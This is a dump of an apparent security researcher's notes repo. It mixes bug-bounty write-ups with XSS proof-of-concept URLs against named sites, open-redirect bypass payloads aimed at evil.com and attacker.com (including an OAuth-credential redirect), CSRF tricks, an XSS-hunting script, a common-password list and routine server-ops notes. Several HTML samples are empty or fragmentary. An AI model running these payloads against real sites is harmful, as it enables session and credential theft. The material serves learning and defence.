├── .gitignore
├── tools
│   ├── requirements.txt
│   ├── crxmake.py
│   ├── top_100_pass.txt
│   ├── generate_csrf_form.py
│   ├── hunt.py
│   ├── xss_via_redirect.py
│   └── zf.py
├── images
│   └── 20150916232022.png
├── 2016-11-05-软链接引起的事故.md
├── 2017-03-22.md
├── 2017-03-30.md
├── 2015-09-16-XSS.md
├── 2016-11-10-配置Mongodb集群的问题.md
├── 2016-09-15-外部服务被劫持导致信息泄露.md
├── 2017-03-23.md
├── 2017-04-01.md
├── 2016-08-05-利用XSSAuditor阻止网站加载指定的JS文件.md
├── 2017-03-24.md
├── 2016-11-18-supervisor常用操作.md
├── 2016-11-05-RedisSentinel配置失误.md
├── 2017-04-16.md
├── 2016-09-07-Weird-Behavior-of-IE.md
├── addthis_poc
│   └── poc.html
├── 2015-09-12-XSS_Reflected.md
├── README.md
├── 2016-05-16-Bypass-URL-Check.md
├── 2016-07-18-JS语法错误vs语义错误.md
├── 2015-11-18-WeiboCSRF.md
├── 2016-06-27-location.hash绕过长度限制.md
├── 2016-05-17-Bypass-Chrome-XSS-Auditor.md
├── 2015-09-05-XSS_encodeURI.html
├── 2016-06-07-document.domain的妙用.md
├── 2016-03-16-XSS.md
├── 2016-08-13-HPP-and-URL-Bypass.md
├── 2016-11-15-iptables相关配置.md
├── 2015-11-08-MyWay.md
├── 2017-08-27-找出是谁登录了你的Gitlab服务器.md
├── 2016-10-13-Flask-MongoEngine连接问题的思考.md
└── 2015-11-07-SQLMap.md
/.gitignore:
--------------------------------------------------------------------------------
*.pyc
--------------------------------------------------------------------------------
/tools/requirements.txt:
--------------------------------------------------------------------------------
futures
multicpu
# also imported by the scripts in this directory (tools/hunt.py, tools/xss_via_redirect.py)
requests
google-api-python-client
--------------------------------------------------------------------------------
/images/20150916232022.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhchbin/xxxx/HEAD/images/20150916232022.png
--------------------------------------------------------------------------------
/2016-11-05-软链接引起的事故.md:
--------------------------------------------------------------------------------
From: https://hackerone.com/reports/178152

While handling user-uploaded files, an archive containing a symlink was accepted. The symlink was not filtered out when the contents were read as JSON, and the resulting error message was passed straight back to the frontend, leaking the contents of files on the server.
--------------------------------------------------------------------------------
/2017-03-22.md:
--------------------------------------------------------------------------------
[Stealing Messenger.com Login Nonces](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/)

It mentions a very handy tool: https://crt.sh/?q=%25.uber.com (a Certificate Transparency search; `%25` is a URL-encoded `%`, the SQL-style wildcard, so this lists every certificate ever issued for any uber.com subdomain). Great for subdomain enumeration!
--------------------------------------------------------------------------------
/2017-03-30.md:
--------------------------------------------------------------------------------
> From https://twitter.com/zseano/status/847295384430956544

I've been having a lot of success lately bypassing open url redirect filters with this: `hxxps://lol.com\.theirsite.com/test (replace hxxps)`
--------------------------------------------------------------------------------
/2015-09-16-XSS.md:
--------------------------------------------------------------------------------
## XSS in the property-listing search endpoint

POC

```html
http://sz.xxxx.com/loupan/rs%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
```

Cause: reflected XSS. The search term is written unescaped into the HTML page and is also saved into a cookie, so the payload fires again on every subsequent page load, not just on the URL that carried it.
--------------------------------------------------------------------------------
/2016-11-10-配置Mongodb集群的问题.md:
--------------------------------------------------------------------------------
* `ulimit` is not an executable but a shell builtin, and `dash`'s builtin does not implement the `-u` (max user processes) option. A script that ends up being interpreted by `dash` (e.g. `#!/bin/sh` on Debian/Ubuntu, where `/bin/sh` is dash) therefore fails with the error below; using `#!/bin/bash` as the interpreter fixes it.

```bash
ulimit: Illegal option -u
```

Reference: https://github.com/edelight/chef-mongodb/issues/146
--------------------------------------------------------------------------------
/2016-09-15-外部服务被劫持导致信息泄露.md:
--------------------------------------------------------------------------------
From: http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty

## Analysis

* Key point: when adding an `inbound parse webhook`, SendGrid did not verify that the recipient domain being configured was actually owned by the account doing the configuring.
* Steps:
    1. Add a webhook URL for the target domain in your own SendGrid account.
    2. Every email sent to that domain (whose MX records already point at SendGrid's inbound servers) is then delivered to your webhook URL.
--------------------------------------------------------------------------------
/2017-03-23.md:
--------------------------------------------------------------------------------
## Which process owns a port
> From http://weibo.com/1273725432/EB6yM6csO?type=comment

To find the process that owns a port I have used lsof, netstat, fuser, pfiles, and even mdb. Only while looking at the XorDDoS Trojan recently did I learn that the newer `ss -napt` is available. The sample goes after ss, so I couldn't resist reading through ss(8).

## Capturing packets with tcpdump

```sh
sudo tcpdump host 172.16.0.1 -i eth1 -w mycap.pcap
```
--------------------------------------------------------------------------------
/2017-04-01.md:
--------------------------------------------------------------------------------
## Posting JSON with an HTML Form
```html
```

The trick relies on `enctype="text/plain"`: the browser then sends each field as `name=value` followed by CRLF, with no percent-encoding at all, so a field whose name is the start of a JSON object and whose value is its end gets joined into a valid JSON document (the `=` in the middle of `"="` below is the separator the browser inserts between name and value). A JSON API that never checks the request `Content-Type` parses it happily, which makes the endpoint CSRF-able with nothing but a form.

This results in a request body of:

```json
{"secret": 1337, "trash": "="}
```
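As an added illustration (not part of the original note), the following Python 3 code reproduces what a browser sends for a `text/plain` form and shows the server-side check that defeats it. `FORM_FIELDS` is a constructed sample derived from the body shown above; the form itself would be `<form method="POST" enctype="text/plain" action="https://target/api">` with the one hidden input.

```python
import json

# Constructed sample: the single hidden field, split so that the browser's
# "name=value" join yields a JSON document.
FORM_FIELDS = [('{"secret": 1337, "trash": "', '"}')]


def text_plain_body(fields):
    """Encode form fields the way a browser does for enctype="text/plain":
    each pair becomes name=value followed by CRLF, with no escaping at all
    (under application/x-www-form-urlencoded the quotes and spaces would be
    percent-encoded and the trick would fail)."""
    return "".join("%s=%s\r\n" % (name, value) for name, value in fields)


def forged_json_body():
    """The body the form produces, parsed as a naive JSON API would parse it."""
    return json.loads(text_plain_body(FORM_FIELDS))


def parse_json_request(content_type, body):
    """Server-side check: a plain HTML form can only send text/plain,
    multipart/form-data or application/x-www-form-urlencoded, so refusing
    anything but application/json stops the cross-site form post outright.
    (A custom Content-Type sent from JavaScript triggers a CORS preflight,
    which the server can deny.) Returns the parsed object or None."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return None
    try:
        return json.loads(body)
    except ValueError:
        return None


if __name__ == "__main__":
    body = text_plain_body(FORM_FIELDS)
    print(repr(body))
    print("naive parse:", forged_json_body())
    print("with Content-Type check:", parse_json_request("text/plain", body))
```

Checking the media type is a complete defence only for endpoints that are never legitimately called with form encodings; otherwise pair it with a CSRF token or a SameSite cookie.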
--------------------------------------------------------------------------------
/2016-08-05-利用XSSAuditor阻止网站加载指定的JS文件.md:
--------------------------------------------------------------------------------
When a page is served with `X-XSS-Protection: 1`, we can put into a request parameter a snippet that also appears verbatim in the page (here the `<script src=...>` tag for a library the page loads). The browser's reflective XSS filter concludes that the matching markup in the response was injected and neutralises that script element, so the page is prevented from loading the named JS file. For example:

http://www.qq.com/?%3Cscript%20type=%22text/javascript%22%20src=%22http://mat1.gtimg.com/www/asset/lib/jquery/jquery/jquery-1.11.1.min.js%22%3E%3C/script%3E

Caveat: this only works in browsers that ship such a filter. Chrome removed XSS Auditor in version 78 (2019) and Firefox never implemented `X-XSS-Protection`, so today this is mainly an illustration of why auditor-style filters were abandoned: they could be turned into a tool for selectively disabling a page's own scripts.
--------------------------------------------------------------------------------
/2017-03-24.md:
--------------------------------------------------------------------------------
> From https://hackerone.com/reports/174474

Being able to set a cookie from the URL hash is pretty wild..
```
https://testerovusera.harvestapp.com/people/1412277/edit#NewGlobalCookieKey=NewGlobalCookieValue;path=/;/
```

> From http://agrrrdog.blogspot.ru/2017/03/autobinding-vulns-and-spring-mvc.html

Learned a new vulnerability class: `Autobinding`, also known as `Mass Assignment` (the framework binds every request parameter onto the model object, including fields the form never exposed).
--------------------------------------------------------------------------------
/2016-11-18-supervisor常用操作.md:
--------------------------------------------------------------------------------
## Day-to-day Supervisor usage

1. Added a new config file; how do I load it?

```bash
$ sudo supervisorctl reread
$ sudo supervisorctl update
```

2. Restart one program

```bash
$ sudo supervisorctl restart xxxx
```

3. Restart everything (reloads the daemon's configuration and restarts all programs)

```bash
$ sudo supervisorctl reload
```

4. Run several processes from one program section

```
process_name = %(program_name)s_%(process_num)02d
numprocs = 2
```
--------------------------------------------------------------------------------
/2016-11-05-RedisSentinel配置失误.md:
--------------------------------------------------------------------------------
While setting up Redis Sentinel I ran into this: if the application and redis-sentinel were started at the same time, the connection worked fine, but if the application was started more than 30 seconds after redis-sentinel it failed with `MasterNotFound/SlaveNotFound`, and the sentinel log showed:

```bash
[16036] 02 Nov 16:24:14.048 # Sentinel runid is 5e67e92ea843190baa6b2acea31ead4796fe2e92
[16036] 02 Nov 16:33:17.585 # +sdown master mymaster 127.0.0.1 6379
```

Cause: redis-sentinel periodically pings the Redis server. When I set things up long ago I had, stupidly, put a password on Redis but never gave redis-sentinel the password it needs to reach Redis (`sentinel auth-pass mymaster <password>`), so every ping failed. `+sdown` is logged once the master has been unreachable for `down-after-milliseconds` (30 s by default), which is exactly the 30-second window observed. Because the config was so old this didn't come to mind while debugging, and I wasted some time on it.
--------------------------------------------------------------------------------
/2017-04-16.md:
--------------------------------------------------------------------------------
> From https://hackerone.com/reports/88719

It is dangerous to use jQuery's ajax functions without specifying the expected data type: jQuery then infers the type from the response's `Content-Type`, and a response served as JavaScript is evaluated. An attacker who controls the endpoint (or can redirect it) can therefore supply a remote JS file and achieve XSS. This is addressed by declaring the expected data type, e.g. `dataType: 'json'` (or using `$.getJSON`).

```
$.get('https://innerht.ml/vectors/js.php')
```

https://innerht.ml/vectors/js.php
```
access-control-allow-credentials:true
access-control-allow-origin:https://jquery.com

alert(document.domain);
```
--------------------------------------------------------------------------------
/2016-09-07-Weird-Behavior-of-IE.md:
--------------------------------------------------------------------------------
```bash
$ curl -i "https://httpbin.org/redirect-to?url=http://%2577%2577%2577%252E%256D%2569%2563%2572%256F%2573%256F%2566%2574%252E%2563%256F%256D/test"

HTTP/1.1 302 FOUND
Location: http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test
```

* Redirected URL for Internet Explorer: http://www.microsoft.com9crosoft.com/test
* Redirected URL for other browsers: http://www.microsoft.com/test

From: http://blog.innerht.ml/internet-explorer-has-a-url-problem/
--------------------------------------------------------------------------------
/addthis_poc/poc.html:
--------------------------------------------------------------------------------
Click anywhere :)
--------------------------------------------------------------------------------
/2015-09-12-XSS_Reflected.md:
--------------------------------------------------------------------------------
## Reflected XSS

The request URL is written straight into an iframe's `src` attribute, with no filtering whatsoever. Barely worth writing down.

```
URL:http://www.xxxxx.net/yun/index.php?m=Index&c=Content&a=index&cid=21&aid=3
```

The page HTML contained:

```html
```

Payload:

```
URL: http://www.xxxxx.net/yun/index.php?m=Index&c=Content&a=index&mid=1&cid=21aaa&aid=3%22%20onmouseover=%22alert%281%29
```

The `%22` closes the `src` attribute and `onmouseover="alert(1)` becomes an event handler on the iframe. Chrome's XSS filter blocks this one; it works in other browsers.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## XXXX

Do you know what I'm up to?

### Tools
* [Bulk-download crossdomain.xml files](tools/hunt.py)
* [Generate CSRF forms from a Burp Suite request export](tools/generate_csrf_form.py)
* [Find URL-redirect XSS via Google search](tools/xss_via_redirect.py)

```bash
$ python xss_via_redirect.py edu.cn
[INFO] Searching links
[INFO] Finding XSS ...
[Potential XSS vulnerability] http://xxxx.xxx.edu.cn/go.asp?url=java%5Cu0073cript%5Cu003a%5Cu0061lert%281%29%3B
```

### Legal Disclaimer

Usage of my scripts for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
--------------------------------------------------------------------------------
/2016-05-16-Bypass-URL-Check.md:
--------------------------------------------------------------------------------
## Ways lax URL checks get bypassed

1. The check only looks for the legitimate domain somewhere in the URL. Bypass is trivial: `http://evil.com/?http://victim.com`.
2. Prefix check that should require the prefix to end in `/` but doesn't. Bypass: `http://victim.com@evil.com/` (userinfo) or `http://victim.com.evil.com` (subdomain of the attacker's domain).
3. Using `?` to defeat the check, learned from http://wooyun.org/bugs/wooyun-2016-0178241: the browser parses `http://evil.com?.victim.com` as `http://evil.com/?.victim.com`, so `.victim.com` ends up in the query string, not the host.
4. From: http://www.slideshare.net/fransrosen/the-secret-life-of-a-bug-bounty-hunter-frans-rosn-security-fest-2016
    * https://www.victim.com/account/logout?redirect_url=https://example.com\@www.victim.com (browsers treat `\` as `/`, so the authority ends at `example.com`, while many server-side parsers read `www.victim.com` as the host after the `@`)
    * https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings (a double-encoded `/`, decoded after the check)
    * https://vimeo.com/log_in?redirect=/%09/example.com (a tab decoded after validation; browsers strip it, leaving the protocol-relative `//example.com`)
    * https://test6473.zendesk.com/access/login?return_to=//example.com:%252525252f@test6473.zendesk.com/x
    * https://trello.com/login?returnUrl=/\example.com (`/\` is normalised to `//`, again protocol-relative)
--------------------------------------------------------------------------------
/2016-07-18-JS语法错误vs语义错误.md:
--------------------------------------------------------------------------------
```html
```

The code above is syntactically valid JS: opening the page still pops the alert, but the script fails at runtime with
```js
Uncaught ReferenceError: indexOf is not defined
```
whereas changing `targetPage^indexOf(":") != -1` to `targetPage#indexOf(":") != -1` produces
```js
test.html:3 Uncaught SyntaxError: Invalid or unexpected token
test.html:11 Uncaught TypeError: top.loadFrames is not a function
```

`a^b` vs `a#b`
> A crucial difference between # and ^: # is not an operator in JavaScript, but ^ is. For example, if `a.b;` is in the page and the `.` is replaced with # and ^, `a#b;` is a syntax error but `a^b;` is valid syntax.

The distinction matters because a syntax error kills the whole script (nothing in it runs, including `loadFrames`), while the `^` variant compiles and only throws at the point where the broken expression is evaluated, leaving everything before it in effect.

From: http://mksben.l0.cm/2016/07/xxn-caret.html
--------------------------------------------------------------------------------
/2015-11-18-WeiboCSRF.md:
--------------------------------------------------------------------------------
## CSRF: click my link and you post a Weibo

Note: not my finding; I saw a well-known account playing with it on Weibo.

There are two ways to defend against CSRF: embed a token in the form when it is generated and have the backend verify it on submission, or verify that the request's `Referer` comes from your own domain. The Weibo Movie endpoint for sharing content to Weibo used the latter, checked server-side. The check, however, is wrong: the correct approach is to match the domain suffix (the Referer host must be `weibo.com` itself or end in `.weibo.com`), but Weibo's backend accepts the request as long as the string `weibo.com` appears anywhere in the host name.

### POC

* test.html

```html
```

* Get a domain and create a subdomain such as `weibo.com.xxx.com`

* In a browser that is logged in to Weibo, visit http://weibo.com.xxx.com/test.html .
* Alternatively, add `127.0.0.1 weibo.com.xxx.com` to your local hosts file and start an HTTP server, e.g. `python -m SimpleHTTPServer 80`
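The redirect-target bypasses in 2016-05-16-Bypass-URL-Check.md and the Referer substring bug above are the same mistake seen from two sides: validating a URL with string operations, or with a parser that disagrees with the browser's. As an added example (Python 3, not code from the original notes), the block below runs the listed payloads through a substring check, a parser-based hostname check, and a hardened check, and shows a Referer check that matches on the domain boundary. `SITE_HOST` and the rewritten payload hosts are assumptions for the demo.

```python
import re
from urllib.parse import urlsplit, unquote

SITE_HOST = "www.victim.com"   # assumed: the only host a redirect may point at
TRUSTED_DOMAIN = "weibo.com"   # the domain the Weibo Referer check should have matched

# Characters browsers reinterpret or drop but server-side parsers keep:
# backslash (WHATWG URL treats it as '/'), ASCII whitespace and control
# characters (stripped before parsing).
UNSAFE = re.compile(r"[\\\s\x00-\x1f\x7f]")

# The bypass payloads from the 2016-05-16 list (hosts rewritten to SITE_HOST).
BYPASSES = [
    "http://evil.com/?http://victim.com",
    "http://victim.com@evil.com/",
    "http://victim.com.evil.com",
    "http://evil.com?.victim.com",
    "https://example.com\\@www.victim.com",
    "https://example.com%252f@www.victim.com%2Fsettings",
    "/%09/example.com",
    "//example.com:%252525252f@www.victim.com/x",
    "/\\example.com",
]


def substring_check(url, domain):
    """Item 1 of the list, and the Weibo Referer bug: 'is the domain in there somewhere?'"""
    return domain in url


def hostname_check(url, allowed_host):
    """Parser-based check that looks correct: accept site-relative paths and
    any absolute URL whose parsed hostname matches. Still bypassable, because
    urlsplit() keeps '\\' as an ordinary character and never decodes %09, so
    it sees a different host than the browser will navigate to."""
    host = urlsplit(url).hostname
    return host is None or host == allowed_host


def redirect_target_ok(url, allowed_host):
    """Hardened check: reject characters browsers reinterpret (raw and after one
    round of percent-decoding), then allow only a plain site-relative path or an
    http(s) URL whose whole authority is exactly the allowed host (no userinfo,
    no port, no scheme-relative '//')."""
    decoded = unquote(url)
    if UNSAFE.search(url) or UNSAFE.search(decoded):
        return False
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        return parts.path.startswith("/") and not decoded.startswith("//")
    return parts.scheme in ("http", "https") and parts.netloc.lower() == allowed_host


def referer_ok(referer, trusted_domain):
    """Referer check done right: the host must be the trusted domain itself or a
    subdomain of it, matched on a '.' boundary, never by substring."""
    if not referer:
        return False   # policy choice: a missing Referer is treated as untrusted
    host = urlsplit(referer).hostname
    if host is None:
        return False
    return host == trusted_domain or host.endswith("." + trusted_domain)


if __name__ == "__main__":
    for u in BYPASSES:
        print("%-55s substring=%-5s hostname=%-5s hardened=%s" % (
            u, substring_check(u, "victim.com"),
            hostname_check(u, SITE_HOST), redirect_target_ok(u, SITE_HOST)))
    print(referer_ok("http://weibo.com.xxx.com/test.html", TRUSTED_DOMAIN))
```

Where possible, avoid accepting URLs at all: redirect to an index into a server-side table of destinations, which removes the parser-mismatch class entirely.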
--------------------------------------------------------------------------------
/2016-06-27-location.hash绕过长度限制.md:
--------------------------------------------------------------------------------
```bash
$ curl -v "http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 1080 (#0)
> GET http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1)) HTTP/1.1
> User-Agent: curl/7.41.0
> Host: ****.edu.cn
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Connection: close
< Date: Mon, 27 Jun 2016 06:13:31 GMT
< Server: Microsoft-IIS/6.0
< X-Powered-By: ASP.NET
< Content-Length: 113
< Content-Type: text/html
< Set-Cookie: ASPSESSIONIDCCTTQQQQ=KLNDIOEAOHCIMEMFJMOOMCHN; path=/
< Cache-control: private
< Proxy-Connection: keep-alive
<

* Closing connection 0
```

Constraints: the `url` parameter may not exceed 100 characters, and some keywords are checked; `url=javascript:alert(1);` for instance is blocked. The keyword filter is bypassed by writing `:` as the JS escape `\u003a` (which works because the value lands inside a JS string on the redirect page), and the length limit is sidestepped by putting the real payload after `#`: the fragment is never sent to the server (note that it is absent from the request line above), so it is neither counted nor filtered, and `eval(location.hash.slice(1))` reads it back in the browser.
--------------------------------------------------------------------------------
/2016-05-17-Bypass-Chrome-XSS-Auditor.md:
--------------------------------------------------------------------------------
FROM: https://html5sec.org/xssauditor/bypasses-052016?xss=%3Clink%20rel=import%20href=https:html5sec.org/

## XSS Auditor Bypasses 05.2016
The bypasses are different for HTTP and HTTPS pages. Here, you can try both variants.

### HTTP Pages

(visit this page via HTTP)
> ?xss= ?xss=Error 404

### Chrome Version
Google Chrome 49.0.2623.75 (Official Build) m (32-bit)
--------------------------------------------------------------------------------
/2015-09-05-XSS_encodeURI.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
33 |
34 |
--------------------------------------------------------------------------------
/tools/crxmake.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Cribbed from http://github.com/Constellation/crxmake/blob/master/lib/crxmake.rb
# and http://src.chromium.org/viewvc/chrome/trunk/src/chrome/tools/extensions/chromium_extension.py?revision=14872&content-type=text/plain&pathrev=14872
#
# Builds a CRX2 package: "Cr24" magic, three little-endian uint32 fields
# (format version, public-key length, signature length), the DER public key,
# the RSA/SHA-1 signature over the zip, then the zip itself. (Newer Chrome
# versions require the CRX3 format instead.)

import struct
import sys
from subprocess import Popen, PIPE

arg0, input, key, output = sys.argv

# Sign the zip file with the private key in PEM format (PKCS#1 v1.5 over SHA-1, as CRX2 requires)
signature = Popen(["openssl", "sha1", "-sign", key, input], stdout=PIPE).communicate()[0]

# Convert the PEM key to DER (and extract the public form) for inclusion in the CRX header
derkey = Popen(["openssl", "rsa", "-pubout", "-inform", "PEM", "-outform", "DER", "-in", key], stdout=PIPE).communicate()[0]

out = open(output, "wb")
out.write(b"Cr24")  # Extension file magic number
# The header fields must be 32-bit little-endian. The original used array("l"),
# whose element size is platform dependent (8 bytes on 64-bit Linux) and which
# produced an unloadable header there.
out.write(struct.pack("<III", 2, len(derkey), len(signature)))  # Version 2
out.write(derkey)
out.write(signature)
zip_data = open(input, 'rb').read()
out.write(zip_data)
out.close()

print("Done.")
--------------------------------------------------------------------------------
/2016-06-07-document.domain的妙用.md:
--------------------------------------------------------------------------------
## A neat use of document.domain

[QQ浏览器9本地文件读取&远程命令执行](http://wooyun.org/bugs/wooyun-2010-0176314) uses a small trick involving `document.domain`.

The page http://event.browser.qq.com/stdl/miyue/index.html includes the frontend script [header.js](http://stdl.qq.com/stdl/tq_center/activity/common/header.js), which sets its document.domain to `qq.com`. That means that if any `qq.com` subdomain loads the page in an iframe and sets the same document.domain, the two documents become same-origin for scripting, and the framing page can reach into the window object of event.browser.qq.com.

```javascript
try {
    document.domain = 'qq.com';
} catch(e) {
}
```

Caveat: the `document.domain` setter is deprecated. Chrome disables it by default since version 115 (a site must send `Origin-Agent-Cluster: ?0` to re-enable it), so this relaxation no longer works in current browsers unless the site explicitly opts in.

### Example

The original case used an XSS. For a local test, edit the `hosts` file to add a qq subdomain, e.g. `127.0.0.1 test.qq.com`, then open the page below in QQ Browser; you will see the specified extension get installed into QQ Browser.

http://test.qq.com/index.html

```html
```
--------------------------------------------------------------------------------
/2016-03-16-XSS.md:
--------------------------------------------------------------------------------
## Another failed test

URL: http://www.acfun.tv/info/status#msgTitle=false;msgContent=4;show=false;email=asdf

Analysis

```js
...
var t, e, n, h, a;
switch (h = $.hash("msgTitle"),
n = $.hash("msgContent"),
a = $.hash("show"),
e = $.hash("email"),
t = "",
n) {
case "1":
    t = "本链接已经被使用,请重新验证";
    break;
case "2":
    t = "出现明目外错误请联系客服";
    break;
case "3":
    t = "本链接已过期,请重新修改";
    break;
case "4":
    t = "您的邮箱为:" + e
}
return $(".content").html(t),
...
```

1. When `n` is 4, `t`, which includes `e` straight from the hash, is written into `.content` via `.html()`. Hey, isn't that XSS?
2. Passing a payload directly: `<`, `(`, `/` and the like all get filtered.
3. `\` is not filtered. Would JS hex or octal escapes work? ```\x3cscript\x3ealert`1`\x3c/script\x3e```
4. No luck. What actually happens:

```html



');
// PASS: $('.xss').html('\x3cscript\x3ealert(1)\x3c/script\x3e');

// PASS http://localhost/#
// FAILED http://localhost/#\x3cscript\x3ealert(1)\x3c/script\x3e
var hash = window.location.hash.substring(1);
$('.xss').html(hash);
```

Note the difference between a sink that sits inside JS source (a string literal in the script) and one where JS reads the value into a variable at runtime. In the former, the JS parser decodes `\xHH` and octal escapes when it compiles the literal, so `.html()` receives real `<script>` tags. In the latter the backslash sequences are just ordinary characters of a runtime string and are never decoded, so `.html()` receives the literal text `\x3cscript...` and no element is created. And with that, this test is declared a failure.
--------------------------------------------------------------------------------
/tools/top_100_pass.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | a123456
3 | 123456a
4 | 5201314
5 | 111111
6 | woaini1314
7 | qq123456
8 | 123123
9 | 000000
10 | 1qaz2wsx
11 | 1q2w3e4r
12 | qwe123
13 | 7758521
14 | 123qwe
15 | a123123
16 | 123456aa
17 | woaini520
18 | woaini
19 | 100200
20 | 1314520
21 | woaini123
22 | 123321
23 | q123456
24 | 123456789
25 | 123456789a
26 | 5211314
27 | asd123
28 | a123456789
29 | z123456
30 | asd123456
31 | a5201314
32 | aa123456
33 | zhang123
34 | aptx4869
35 | 123123a
36 | 1q2w3e4r5t
37 | 1qazxsw2
38 | 5201314a
39 | 1q2w3e
40 | aini1314
41 | 31415926
42 | q1w2e3r4
43 | 123456qq
44 | woaini521
45 | 1234qwer
46 | a111111
47 | 520520
48 | iloveyou
49 | abc123
50 | 110110
51 | 111111a
52 | 123456abc
53 | w123456
54 | 7758258
55 | 123qweasd
56 | 159753
57 | qwer1234
58 | a000000
59 | qq123123
60 | zxc123
61 | 123654
62 | abc123456
63 | 123456q
64 | qq5201314
65 | 12345678
66 | 000000a
67 | 456852
68 | as123456
69 | 1314521
70 | 112233
71 | 521521
72 | qazwsx123
73 | zxc123456
74 | abcd1234
75 | asdasd
76 | 666666
77 | love1314
78 | QAZ123
79 | aaa123
80 | q1w2e3
81 | aaaaaa
82 | a123321
83 | 123000
84 | 11111111
85 | 12qwaszx
86 | 5845201314
87 | s123456
88 | nihao123
89 | caonima123
90 | zxcvbnm123
91 | wang123
92 | 159357
93 | 1A2B3C4D
94 | asdasd123
95 | 584520
96 | 753951
97 | 147258
98 | 1123581321
99 | 110120
100 | qq1314520
101 |
--------------------------------------------------------------------------------
/2016-08-13-HPP-and-URL-Bypass.md:
--------------------------------------------------------------------------------
## HTTP Parameter Pollution

From https://hackerone.com/reports/114169

For example:

> https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.com

The first host (host=https://www.periscope.tv) is validated but not the second one. After authentication the second host (host=https://attacker.com) is used as the transfer origin.

## URL Bypass
From https://hackerone.com/reports/108113

However, it is discovered that when outputting a non-ASCII character in the header, it will get converted to a question mark (?). This happens after the validation. Thus, an attacker can bypass the validation by putting his/her own domain followed by a non-ASCII character in the authority part.

Here's how it works:

Input:

```
https://attacker.com%ff@www.periscope.tv
--------\ authority /\ hostname /
```
The URL is parsed and passes the validation because the hostname matches the registered domain.

Output:
```
https://attacker.com?@www.periscope.tv
--------\ hostname /-\ query /
```
Since the URL is output in the Location header, `%ff`, which is non-ASCII, is converted. Now suddenly the hostname becomes attacker.com and everything after the question mark becomes the query part. Finally the victim will be redirected to the attacker's site with the victim's OAuth credential.
--------------------------------------------------------------------------------
/2016-11-15-iptables相关配置.md:
--------------------------------------------------------------------------------
Allow only DNS lookups, NTP time sync, ping, and traffic to/from whitelisted IPs (inbound and outbound)

```bash
#!/bin/bash

set -o nounset
set -o errexit

echo "clean all rules before"
iptables -F
iptables -X

echo "setting up default rules"
# Policies stay ACCEPT while the chains are rebuilt so that a rule failing
# under errexit cannot leave the host unreachable; they are switched to DROP
# only once the allow rules are in place.
iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT

declare -a whitelist=(
    "192.168.1.1"
    "192.168.1.2")

echo "setting up input chain"
iptables -A INPUT -i lo -j ACCEPT                                  # loopback
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT   # replies to our own traffic, incl. DNS/NTP answers and ping replies
for i in "${whitelist[@]}"
do
    iptables -A INPUT -s "$i" -j ACCEPT
done
# No "--sport 53" / "--sport 123" ACCEPT rules here: conntrack already admits
# the answers, and a rule keyed on the remote source port would let anyone
# reach every UDP service on this host simply by sending from port 53 or 123.
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT       # ping
iptables -P INPUT DROP

echo "setting up output chain"
iptables -A OUTPUT -o lo -j ACCEPT                                 # loopback
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT  # existing connections
for i in "${whitelist[@]}"
do
    iptables -A OUTPUT -d "$i" -j ACCEPT
done
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT                     # dns
iptables -A OUTPUT -p udp --dport 123 -j ACCEPT                    # ntp
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT      # ping
iptables -P OUTPUT DROP

echo
iptables -vnL
```
--------------------------------------------------------------------------------
/2015-11-08-MyWay.md:
--------------------------------------------------------------------------------
A couple of days ago, on a whim, I answered a question on Zhihu. It didn't get many upvotes, but it serves as a record of some self-reflection!

Let me take a shot at answering. I'm currently working hard at becoming a script kiddie; my WooYun rank should soon be enough to go from "passer-by" to "intern white hat".

What's my motivation? It's a hobby. I took the Web security elective in undergrad purely because it sounded fun, and Prof. 蔡国杨's course really was good. That's where I picked up a lot of the basics: XSS, SQL injection, CSRF, buffer overflows and so on; the TA even had us do homework on [google/gruyere](https://google-gruyere.appspot.com/) (Google's practice lab). But like you, I was less than a script kiddie: asked to find a vulnerability in a website, I had no idea where to start. Still, back then I quietly held on to a privilege-escalation bug (fancy term, that) in the university's education system, a way to look up student details by student number, and, yes, a bug that let a teacher change course grades (that one I reported to my counsellor right away; I'm a good guy, right?). All of those could be found just by being careful, and at the time I didn't think of them as vulnerabilities, only as fun. During my master's I was busy with internships and with contributing code to open-source projects, so I didn't put much energy into this. Then recently I graduated and started work, and I needed something fun to do outside work (a friend told me to be an interesting person and stop fighting with computers all the time; sadly my hobbies are pitifully few: watching American TV shows, learning to cook, playing basketball; don't be like me, there's no saving me), plus two friends had started doing penetration testing for a living. So the old enthusiasm came back, and once I started I couldn't stop. In my spare time I read through 余弦's 《Web前端黑客技术揭秘》 and the XSS tutorial by 心伤的瘦子 on WooYun, and began my quest to grind rank on WooYun.

